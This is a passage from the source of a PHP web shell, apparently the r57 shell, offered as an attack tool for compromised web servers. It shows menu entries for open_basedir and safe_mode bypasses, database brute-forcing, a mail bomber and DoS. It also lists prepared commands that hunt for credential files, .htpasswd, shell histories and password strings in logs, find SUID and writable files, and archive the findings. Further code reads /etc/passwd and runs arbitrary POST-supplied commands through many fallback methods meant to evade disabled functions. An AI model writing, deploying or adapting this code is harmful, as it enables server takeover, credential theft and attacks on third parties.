2682'eng_text127'=>'Test bypass open_basedir, add data to file via readfile(php://) (PHP <= 5.2.1, 4.4.4)',
2683
2684'eng_text128'=>'Modify/Access file (touch)',
2685
2686'eng_text129'=>'Test bypass open_basedir, create file via fopen(srpath://) (PHP v5.2.0)',
2687
2688'eng_text130'=>'Test bypass open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)',
2689
2690'eng_text131'=>'Test bypass open_basedir, view file contest via symlink() (PHP <= 5.2.1)',
2691
2692'eng_text132'=>'Test bypass open_basedir, view dir list via symlink() (PHP <= 5.2.1)',
2693
2694'eng_text133'=>'Test bypass open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4)',
2695
2696'eng_text134'=>'Database-bruteforce',
2697
2698'eng_text135'=>'Dictionary',
2699
2700'eng_text136'=>'Creating evil symlink',
2701
2702'eng_text137'=>'Useful',
2703
2704'eng_text138'=>'Dangerous',
2705
2706'eng_text139'=>'Mail Bomber',
2707
2708'eng_text140'=>'DoS',
2709
2710'eng_text141'=>'Danger! Web-daemon crash possible.',
2711
2712'eng_text142'=>'Downloaders',
2713
2714'eng_text143'=>'Temp: ',
2715
2716'eng_text144'=>'Test bypass safe_mode with load file in mysqli',
2717
2718'eng_text145'=>'Test bypass open_basedir, view dir list via realpath() (PHP <= 5.2.4)',
2719
2720'eng_text146'=>'Max Interation',
2721
2722'eng_text147'=>'',
2723
2724'eng_text148'=>'',
2725
2726'eng_text149'=>'',
2727
2728'eng_text150'=>'',
2729
2730'eng_err0'=>'Error! Can\'t write in file ',
2731
2732'eng_err1'=>'Error! Can\'t read file ',
2733
2734'eng_err2'=>'Error! Can\'t create ',
2735
2736'eng_err3'=>'Error! Can\'t connect to ftp',
2737
2738'eng_err4'=>'Error! Can\'t login on ftp server',
2739
2740'eng_err5'=>'Error! Can\'t change dir on ftp',
2741
2742'eng_err6'=>'Error! Can\'t sent mail',
2743
2744'eng_err7'=>'Mail send',
2745
2746);
2747
2748/*
2749
2750?????? ??????
2751
2752????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )
2753
2754?? ?????? ???? ????????? ??? ???????? ???????.
2755
2756*/
2757
2758$aliases=array(
2759
2760'----------------------------------locate'=>'',
2761
2762'locate httpd.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate httpd.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2763
2764'locate vhosts.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate vhosts.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2765
2766'locate proftpd.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate proftpd.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2767
2768'locate psybnc.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate psybnc.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2769
2770'locate my.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate my.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2771
2772'locate admin.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate admin.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2773
2774'locate cfg.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate cfg.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2775
2776'locate conf.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate conf.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2777
2778'locate config.dat files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.dat >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2779
2780'locate config.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2781
2782'locate config.inc files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.inc >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2783
2784'locate config.inc.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.inc.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2785
2786'locate config.default.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.default.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2787
2788'locate .conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".conf" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2789
2790'locate .pwd files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".pwd" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2791
2792'locate .sql files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".sql" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2793
2794'locate .htpasswd files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".htpasswd" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2795
2796'locate .bash_history files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".bash_history" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2797
2798'locate .mysql_history files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".mysql_history" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2799
2800'locate backup files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate backup >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2801
2802'locate dump files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate dump >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2803
2804'locate priv files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate priv >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2805
2806'----------------------------------tar'=>'',
2807
2808'tar -czvf all.tgz -T '.$tempdir.'grep.txt'=>'tar -czvf all.tgz -T '.$tempdir.'grep.txt',
2809
2810'----------------------------------1'=>'',
2811
2812'locate auth_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate auth_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2813
2814'locate access_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate access_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2815
2816'locate error_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate error_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2817
2818'locate auth.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate auth.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2819
2820'locate access.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate access.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2821
2822'locate error.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate error.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2823
2824'locate ".log" files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".log" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2825
2826'----------------------------------2'=>'',
2827
2828'cat /var/log/httpd/auth_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/auth_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt',
2829
2830'cat /var/log/httpd/access_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/access_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt',
2831
2832'cat /var/log/httpd/error_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/error_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt',
2833
2834'cat /var/log/httpd/auth.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/auth.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt',
2835
2836'cat /var/log/httpd/access.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/access.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt',
2837
2838'cat /var/log/httpd/error.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/error.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt',
2839
2840'----------------------------------find'=>'',
2841
2842'find suid files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -perm -04000 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2843
2844'find suid files in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -type f -perm -04000 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2845
2846'find sgid files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -perm -02000 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2847
2848'find sgid files in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -type f -perm -02000 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2849
2850'find all writable files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2851
2852'find all writable files in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -type f -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2853
2854'find all writable directories >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type d -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2855
2856'find all writable directories in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -type d -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2857
2858'find all writable directories and files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2859
2860'find all writable directories and files in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2861
2862'find all .htpasswd files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name .htpasswd >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2863
2864'find all .bash_history files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name .bash_history >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2865
2866'find all .mysql_history files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name .mysql_history >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2867
2868'find all .fetchmailrc files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name .fetchmailrc >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2869
2870'find httpd.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name httpd.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2871
2872'find vhosts.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name vhosts.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2873
2874'find proftpd.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name proftpd.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2875
2876'find admin.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name admin.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2877
2878'find config* files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "config*" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2879
2880'find cfg.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name cfg.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2881
2882'find conf.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name conf.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2883
2884'find config.dat files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.dat >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2885
2886'find config.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2887
2888'find config.inc files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.inc >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2889
2890'find config.inc.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.inc.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2891
2892'find config.default.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.default.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2893
2894'find *.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*.conf" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2895
2896'find *.pwd files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*.pwd" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2897
2898'find *.sql files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*.sql" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2899
2900'find *backup* files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*backup*" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2901
2902'find *dump* files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*dump*" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2903
2904'-----------------------------------'=>'',
2905
2906'find /var/ auth_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name auth_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2907
2908'find /var/ access_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name access_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2909
2910'find /var/ error_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name error_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2911
2912'find /var/ auth.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name auth.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2913
2914'find /var/ access.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name access.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2915
2916'find /var/ error.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name error.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2917
2918'find /var/ "*_log" files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name "*.log" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2919
2920'find /var/ "*.log" files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name "*.log" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2921
2922'----------------------------------------------------------------------------------------------------'=>'ls -la'
2923
2924);
2925
2926$table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
2927
2928$table_up2 = " ::</div></b></font></td></tr><tr><td>";
2929
2930$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
2931
2932$table_end1 = "</td></tr>";
2933
2934$arrow = " <font face=Webdings color=gray>4</font>";
2935
2936$lb = "<font color=black>[</font>";
2937
2938$rb = "<font color=black>]</font>";
2939
2940$font = "<font face=Verdana size=-2>";
2941
2942$ts = "<table class=table1 width=100% align=center>";
2943
2944$te = "</table>";
2945
2946$fs = "<form name=form method=POST>";
2947
2948$fe = "</form>";
2949
2950
2951
2952if(isset($_GET['users']))
2953
2954 {
2955
2956 if(!$users=get_users('/etc/passwd')) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
2957
2958 else
2959
2960 {
2961
2962 echo '<center>';
2963
2964 foreach($users as $user) { echo $user."<br>"; }
2965
2966 echo '</center>';
2967
2968 }
2969
2970 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die();
2971
2972 }
2973
2974
2975
2976if (!empty($_POST['dir'])) { if(@function_exists('chdir')){@chdir($_POST['dir']);} else if(@function_exists('chroot')){ @chroot($_POST['dir']);}; }
2977
2978if (empty($_POST['dir'])){if(@function_exists('chdir')){$dir = @getcwd();};}else{$dir=$_POST['dir'];}
2979
2980$unix = 0;
2981
2982if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
2983
2984if(empty($dir))
2985
2986 {
2987
2988 $os = getenv('OS');
2989
2990 if(empty($os)){ $os = @php_uname(); }
2991
2992 if(empty($os)){ $os ="-"; $unix=1; }
2993
2994 else
2995
2996 {
2997
2998 if(@eregi("^win",$os)) { $unix = 0; }
2999
3000 else { $unix = 1; }
3001
3002 }
3003
3004 }
3005
3006
3007
3008if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
3009
3010 {
3011
3012 echo $head;
3013
3014 if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
3015
3016 else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
3017
3018 $sr->SearchText(0,0);
3019
3020 $res = $sr->GetResultFiles();
3021
3022 $found = $sr->GetMatchesCount();
3023
3024 $titles = $sr->GetTitles();
3025
3026 $r = "";
3027
3028 if($found > 0)
3029
3030 {
3031
3032 $r .= "<TABLE width=100%>";
3033
3034 foreach($res as $file=>$v)
3035
3036 {
3037
3038 $r .= "<TR>";
3039
3040 $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
3041
3042 $r .= (!$unix)? str_replace("/","\\",$file) : $file;
3043
3044 $r .= "</b></font></ TD>";
3045
3046 $r .= "</TR>";
3047
3048 foreach($v as $a=>$b)
3049
3050 {
3051
3052 $r .= "<TR>";
3053
3054 $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
3055
3056 $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
3057
3058 $r .= "</TR>\n";
3059
3060 }
3061
3062 }
3063
3064 $r .= "</TABLE>";
3065
3066 echo $r;
3067
3068 }
3069
3070 else
3071
3072 {
3073
3074 echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
3075
3076 }
3077
3078 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>";
3079
3080 die();
3081
3082 }
3083
3084
3085
3086/*if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }*/
3087
3088if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }else{$safe_mode = 0;}
3089
3090$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
3091
3092if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
3093
3094
3095
3096function ws($i)
3097
3098{
3099
3100return @str_repeat(" ",$i);
3101
3102}
3103
3104
3105
3106function ex($cfe)
3107
3108{global $unix,$tempdir;
3109
3110 $res = '';
3111
3112 if (!empty($cfe))
3113
3114 {
3115
3116 if(@function_exists('exec'))
3117
3118 {
3119
3120 @exec($cfe,$res);
3121
3122 $res = join("\n",$res);
3123
3124 }
3125
3126 elseif(@function_exists('shell_exec'))
3127
3128 {
3129
3130 $res = @shell_exec($cfe);
3131
3132 }
3133
3134 elseif(@function_exists('system'))
3135
3136 {
3137
3138 @ob_start();
3139
3140 @system('$cfe');
3141
3142 $res = @ob_get_contents();
3143
3144 @ob_end_clean();
3145
3146 }
3147
3148 elseif(@function_exists('passthru'))
3149
3150 {
3151
3152 @ob_start();
3153
3154 @passthru($cfe);
3155
3156 $res = @ob_get_contents();
3157
3158 @ob_end_clean();
3159
3160 }
3161
3162 elseif(@function_exists('popen') && @is_resource($f = @popen($cfe,"r")))
3163
3164 {
3165
3166 $res = "";
3167
3168 if(@function_exists('fread') && @function_exists('feof')){
3169
3170 while(!@feof($f)) { $res .= @fread($f,1024); }
3171
3172 }else if(@function_exists('fgets') && @function_exists('feof')){
3173
3174 while(!@feof($f)) { $res .= @fgets($f,1024); }
3175
3176 }
3177
3178 @pclose($f);
3179
3180 }
3181
3182 elseif(@function_exists('proc_open') && @is_resource($f = @proc_open($cfe,array(1 => array("pipe", "w")),$pipes)))
3183
3184 {
3185
3186 $res = "";
3187
3188 if(@function_exists('fread') && @function_exists('feof')){
3189
3190 while(!@feof($pipes[1])) {$res .= @fread($pipes[1], 1024);}
3191
3192 }else if(@function_exists('fgets') && @function_exists('feof')){
3193
3194 while(!@feof($pipes[1])) {$res .= @fgets($pipes[1], 1024);}
3195
3196 }
3197
3198 @proc_close($f);
3199
3200 }
3201
3202 }else{$res = safe_ex($cfe);}
3203
3204 return htmlspecialchars($res);
3205
3206}
3207
3208
3209
3210
3211
3212function safe_ex($cfe)
3213
3214{global $unix,$tempdir;
3215
3216 $res = '';
3217
3218 if (!empty($cfe))
3219
3220 {
3221
3222 if(extension_loaded('perl')){
3223
3224 @ob_start();
3225
3226 $safeperl=new perl();
3227
3228 $safeperl->eval("system('$cfe')");
3229
3230 $res = @ob_get_contents();
3231
3232 @ob_end_clean();
3233
3234 }
3235
3236 elseif(!$unix && extension_loaded('ffi'))
3237
3238 {
3239
3240 $output=$tempdir.uniqid('NJ');
3241
3242 $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
3243
3244 if(!@function_exists('escapeshellarg')){$res=$api->WinExec("cmd.exe /c $cfe >\"$output\"",0);}
3245
3246 else{$res=$api->WinExec("cmd.exe /c ".@escapeshellarg($cfe)." >\"$output\"",0);}
3247
3248 while(!@file_exists($output))sleep(1);
3249
3250 $res=moreread($output);
3251
3252 @unlink($output);
3253
3254 }
3255
3256 elseif(!$unix && extension_loaded('win32service'))
3257
3258 {
3259
3260 $output=$tempdir.uniqid('NJ');
3261
3262 $n_ser=uniqid('NJ');
3263
3264 if(!@function_exists('escapeshellarg'))
3265
3266 {@win32_create_service(array('service'=>$n_ser,'display'=>$n_ser,'path'=>'c:\\windows\\system32\\cmd.exe','params'=>"/c $cfe >\"$output\""));}
3267
3268 else{@win32_create_service(array('service'=>$n_ser,'display'=>$n_ser,'path'=>'c:\\windows\\system32\\cmd.exe','params'=>"/c ".@escapeshellarg($cfe)." >\"$output\""));}
3269
3270 @win32_start_service($n_ser);
3271
3272 @win32_stop_service($n_ser);
3273
3274 @win32_delete_service($n_ser);
3275
3276 while(!@file_exists($output))sleep(1);
3277
3278 $res=moreread($output);
3279
3280 @unlink($output);
3281
3282 }
3283
3284 elseif(!$unix && extension_loaded("win32std"))
3285
3286 {
3287
3288 $output=$tempdir.uniqid('NJ');
3289
3290 if(!@function_exists('escapeshellarg')){@win_shell_execute('..\..\..\..\..\..\..\windows\system32\cmd.exe /c '.$cfe.' > "'.$output.'"');}
3291
3292 else{@win_shell_execute('..\..\..\..\..\..\..\windows\system32\cmd.exe /c '.@escapeshellarg($cfe).' > "'.$output.'"');}
3293
3294 while(!@file_exists($output))sleep(1);
3295
3296 $res=moreread($output);
3297
3298 @unlink($output);
3299
3300 }
3301
3302 elseif(!$unix)
3303
3304 {
3305
3306 $output=$tempdir.uniqid('NJ');
3307
3308 $suntzu = new COM("WScript.Shell");
3309
3310 if(!@function_exists('escapeshellarg')){$suntzu->Run('c:\windows\system32\cmd.exe /c '.$cfe.' > "'.$output.'"');}
3311
3312 else{$suntzu->Run('c:\windows\system32\cmd.exe /c '.@escapeshellarg($cfe).' > "'.$output.'"');}
3313
3314 $res=moreread($output);
3315
3316 @unlink($output);
3317
3318 }
3319
3320 elseif(@function_exists('pcntl_exec') && @function_exists('pcntl_fork'))
3321
3322 {
3323
3324 $res = '[~] Blind Command Execution via [pcntl_exec]\n\n';
3325
3326 $output=$tempdir.uniqid('pcntl');
3327
3328 $pid = @pcntl_fork();
3329
3330 if ($pid == -1) {
3331
3332 $res .= '[-] Could not children fork. Exit';
3333
3334 } else if ($pid) {
3335
3336 if (@pcntl_wifexited($status)){$res .= '[+] Done! Command "'.$cfe.'" successfully executed.';}
3337
3338 else {$res .= '[-] Error. Command incorrect.';}
3339
3340 } else {
3341
3342 $cfe = array(" -e 'system(\"$cfe > $output\")'");
3343
3344 if(@pcntl_exec('/usr/bin/perl',$cfe)) exit(0);
3345
3346 if(@pcntl_exec('/usr/local/bin/perl',$cfe)) exit(0);
3347
3348 die();
3349
3350 }
3351
3352 $res=moreread($output);
3353
3354 @unlink($output);
3355
3356 }
3357
3358/* elseif(1)
3359
3360 {
3361
3362
3363
3364 }
3365
3366*/
3367
3368 }
3369
3370 return htmlspecialchars($res);
3371
3372}
3373
3374
3375
3376function get_users($filename)
3377
3378{
3379
3380 $users = $rows = array();
3381
3382 $rows=@explode("\n",moreread($filename));
3383
3384 if(!$rows[0]){$rows=@explode("\n",readzlib($filename));}
3385
3386 if(!$rows[0]) return 0;
3387
3388 foreach ($rows as $string)
3389
3390 {
3391
3392 $user = @explode(":",trim($string));
3393
3394 if(substr($string,0,1)!='#') array_push($users,$user[0]);
3395
3396 }
3397
3398 return $users;
3399
3400}
3401
3402function err($n,$txt='')
3403
3404{
3405
3406echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>';
3407
3408echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
3409
3410if(!empty($txt)) { echo " $txt"; }
3411
3412echo '</b></div></font></td></tr></table>';
3413
3414return null;
3415
3416}
3417
3418function perms($mode)
3419
3420{
3421
3422if (!$GLOBALS['unix']) return 0;
3423
3424if( $mode & 0x1000 ) { $type='p'; }
3425
3426else if( $mode & 0x2000 ) { $type='c'; }
3427
3428else if( $mode & 0x4000 ) { $type='d'; }
3429
3430else if( $mode & 0x6000 ) { $type='b'; }
3431
3432else if( $mode & 0x8000 ) { $type='-'; }
3433
3434else if( $mode & 0xA000 ) { $type='l'; }
3435
3436else if( $mode & 0xC000 ) { $type='s'; }
3437
3438else $type='u';
3439
3440$owner["read"] = ($mode & 00400) ? 'r' : '-';
3441
3442$owner["write"] = ($mode & 00200) ? 'w' : '-';
3443
3444$owner["execute"] = ($mode & 00100) ? 'x' : '-';
3445
3446$group["read"] = ($mode & 00040) ? 'r' : '-';
3447
3448$group["write"] = ($mode & 00020) ? 'w' : '-';
3449
3450$group["execute"] = ($mode & 00010) ? 'x' : '-';
3451
3452$world["read"] = ($mode & 00004) ? 'r' : '-';
3453
3454$world["write"] = ($mode & 00002) ? 'w' : '-';
3455
3456$world["execute"] = ($mode & 00001) ? 'x' : '-';
3457
3458if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
3459
3460if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
3461
3462if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
3463
3464$s=sprintf("%1s", $type);
3465
3466$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
3467
3468$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
3469
3470$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
3471
3472return trim($s);
3473
3474}
3475
3476function in($type,$name,$size,$value,$checked=0)
3477
3478{
3479
3480 $ret = "<input type=".$type." name=".$name." ";
3481
3482 if($size != 0) { $ret .= "size=".$size." "; }
3483
3484 $ret .= "value=\"".$value."\"";
3485
